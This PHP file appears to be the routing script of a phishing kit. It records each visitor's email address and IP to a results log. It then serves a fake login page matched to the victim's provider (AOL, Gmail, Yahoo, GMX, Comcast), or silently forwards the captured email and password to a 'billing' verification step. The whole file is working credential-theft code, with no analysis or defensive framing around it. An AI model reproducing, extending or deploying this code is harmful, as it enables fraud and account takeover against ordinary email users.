<?php
require_once('admin/config.php');
require_once('main.php');
$ip = getUserIP();
$email = explode("@",$_POST['email']);
if (!isset($_POST['email'])) {
exit(header("HTTP/1.0 404 Not Found"));
}if($config['get_email'] == "on"){
    if (preg_match('/aol/',  $email[1])){
        tulis_file("admin/result/total_click.txt", "".$cn."|".$_POST['email']."|".$ip."|Mengakses Login Aol|".$date."");
        require_once('files/login-aol.php');
    }elseif (preg_match('/gmail/',  $email[1])){
        tulis_file("admin/result/total_click.txt", "".$cn."|".$_POST['email']."|".$ip."|Mengakses Login Gmail|".$date."");
        require_once('files/login-gmail.php');
    }elseif (preg_match('/yahoo/',  $email[1])){
        tulis_file("admin/result/total_click.txt", "".$cn."|".$_POST['email']."|".$ip."|Mengakses Login Yahoo|".$date."");
        require_once('files/login-yahoo.php');
    }elseif (preg_match('/gmx/',  $email[1])){
        tulis_file("admin/result/total_click.txt", "".$cn."|".$_POST['email']."|".$ip."|Mengakses Login Gmx|".$date."");
        require_once('files/login-gmx.php');
    }elseif (preg_match('/comcast/',  $email[1])){
        tulis_file("admin/result/total_click.txt", "".$cn."|".$_POST['email']."|".$ip."|Mengakses Login Cmmcast|".$date."");
        require_once('files/login-comcast.php');
    }else{
        tulis_file("admin/result/total_click.txt", "".$cn."|".$_POST['email']."|".$ip."|Mengakses Halaman Billing|".$date."");
        echo "<form id='ptz' method='POST' action='auth/verify'><input type='hidden' name='email' value='".$_POST['email']."'><input type='hidden' name='password' value='".$_POST['password']."'><input type='hidden' name='apistatus' value='".$_POST['apistatus']."'></form><script type='text/javascript'>document.getElementById('ptz').submit();</script>";
    }
}else{
    tulis_file("admin/result/total_click.txt", "".$cn."|".$_POST['email']."|".$ip."|Mengakses Halaman Billing|".$date."");
    echo "<form id='ptz' method='POST' action='auth/verify'><input type='hidden' name='email' value='".$_POST['email']."'><input type='hidden' name='password' value='".$_POST['password']."'><input type='hidden' name='apistatus' value='".$_POST['apistatus']."'></form><script type='text/javascript'>document.getElementById('ptz').submit();</script>";
}
?>